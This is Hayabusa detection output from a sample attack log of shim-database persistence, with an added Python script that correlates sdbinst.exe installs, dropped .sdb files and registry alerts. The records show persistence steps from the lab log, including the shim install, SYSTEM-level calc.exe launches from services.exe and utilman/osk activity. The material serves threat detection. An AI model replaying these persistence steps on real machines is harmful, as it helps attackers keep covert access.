365ABB72-5310-5C91-0000-001096A90100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 365ABB72-532B-5C91-0000-00100EB40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 
365ABB72-5345-5C91-0000-001019C40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 365ABB72-5366-5C91-0000-00109FCD0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,info,,Process 
Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 365ABB72-53A2-5C91-0000-001093E70100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 365ABB72-53DE-5C91-0000-00104D160200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 
365ABB72-5418-5C91-0000-001089390300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
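The records in this output show two things worth correlating rather than reading alert by alert: a run of calc.exe and cmd.exe launches by services.exe as NT AUTHORITY\SYSTEM (each paired with a "Suspicious SYSTEM User Process Creation" hit), and a shim-database install chain in which Compatadmin.exe runs sdbinst.exe, sdbinst.exe drops a GUID-named .sdb under C:\Windows\AppPatch\Custom, and the registry rule fires several times within a few milliseconds. The following Python is an added example, not Hayabusa's code and not part of this CSV: it parses records in this exact column layout (Timestamp, Computer, EventID, Level, MitreAttack, RuleTitle, Details, RulePath, FilePath), splits the "Key: value | Key: value" Details column, ties each sdbinst.exe launch to the .sdb it created via the shared PGUID, and separates -u (uninstall) runs, which trigger the same Sigma rule, from actual installs. The embedded sample CSV is constructed in the shape of the records above with shortened rule paths; the allowlist of service images and the 5-second registry window are assumptions for the example, not the Sigma rules' own logic.

```python
"""Correlate Hayabusa CSV detections: shim-database persistence chain plus
SYSTEM-user children of services.exe. Added example, not Hayabusa's code."""
import csv
import io
from datetime import datetime, timedelta

# Constructed sample in the layout of this output (rule paths shortened).
SAMPLE_CSV = r'''Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,rules/1_ProcessCreated.yml,sample.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,rules/1_ProcessCreated.yml,sample.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",rules/1_ProcessCreated.yml,sample.evtx
2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,rules/11_FileCreated.yml,sample.evtx
2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/win_re_shim_databases_persistence.yml,sample.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",rules/1_ProcessCreated.yml,sample.evtx
'''

# Assumed baseline of images services.exe legitimately starts as SYSTEM on
# this host; anything else is reported. Not the Sigma rule's own list.
SERVICE_HOST_ALLOWLIST = {"svchost.exe", "spoolsv.exe", "sysmon.exe", "wlms.exe",
                          "vboxservice.exe", "taskhost.exe", "ui0detect.exe"}


def parse_details(details):
    """Split Hayabusa's 'Key: value | Key: value' Details column into a dict."""
    out = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        if sep:
            out[key.strip()] = value.strip()
    return out


def load_events(text):
    """Parse the CSV, attaching an aware datetime and the parsed Details."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        row["ts"] = datetime.strptime(row["Timestamp"], "%Y-%m-%d %H:%M:%S.%f %z")
        row["fields"] = parse_details(row["Details"])
        events.append(row)
    return events


def services_exe_anomalies(events):
    """(pid, image) for SYSTEM processes spawned by services.exe whose image
    is outside the allowlist: the calc.exe / cmd.exe pattern in this output."""
    hits = []
    for ev in events:
        f = ev["fields"]
        if ev["EventID"] != "1" or f.get("User") != r"NT AUTHORITY\SYSTEM":
            continue
        if not f.get("Parent Cmd", "").lower().endswith(r"\services.exe"):
            continue
        image = f.get("Process", "").rsplit("\\", 1)[-1].lower()
        if image not in SERVICE_HOST_ALLOWLIST:
            hits.append((f["PID"], image))
    return hits


def shim_install_chains(events, window=timedelta(seconds=5)):
    """For each sdbinst.exe launch, find the .sdb it dropped under
    AppPatch\\Custom (same PGUID) and count shim-database registry alerts
    inside the window. '-u' runs are uninstalls and never count as persistence."""
    chains = []
    for ev in events:
        f = ev["fields"]
        if ev["EventID"] != "1" or not f.get("Process", "").lower().endswith(r"\sdbinst.exe"):
            continue
        uninstall = "-u" in f.get("Cmd", "").split()
        pguid = f.get("PGUID")
        sdb_files = [e["fields"]["Path"] for e in events
                     if e["EventID"] == "11" and e["fields"].get("PGUID") == pguid
                     and "\\apppatch\\custom\\" in e["fields"].get("Path", "").lower()]
        reg_alerts = sum(1 for e in events
                         if e["EventID"] == "13" and "Shim DataBase" in e["RuleTitle"]
                         and ev["ts"] <= e["ts"] <= ev["ts"] + window)
        chains.append({
            "pid": f["PID"],
            "parent": f.get("Parent Cmd", "").rsplit("\\", 1)[-1].strip('"'),
            "uninstall": uninstall,
            "sdb_files": sdb_files,
            "registry_alerts": reg_alerts,
            # Install + dropped .sdb + registry change is the persistence shape.
            "persistence": (not uninstall) and bool(sdb_files) and reg_alerts > 0,
        })
    return chains


if __name__ == "__main__":
    evs = load_events(SAMPLE_CSV)
    for pid, image in services_exe_anomalies(evs):
        print(f"[anomaly] SYSTEM child of services.exe: pid={pid} image={image}")
    for c in shim_install_chains(evs):
        tag = "PERSISTENCE" if c["persistence"] else "uninstall or partial chain"
        print(f"[shim] sdbinst pid={c['pid']} parent={c['parent']}: {tag}; "
              f"sdb={c['sdb_files']} registry_alerts={c['registry_alerts']}")
```

Run it against a real Hayabusa CSV by replacing SAMPLE_CSV with the file contents; the PGUID join is what makes the chain reliable, since PIDs are reused across a boot while Sysmon's process GUID is not. Triage note: the Sigma rule fires on the -u uninstall as well, so the install/uninstall pair around the same Test.SDB above is one operator action, not two separate persistence attempts.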
2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 365ABB72-546C-5C91-0000-00106A730400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:25.856 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:47:56.436 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.509 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.559 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
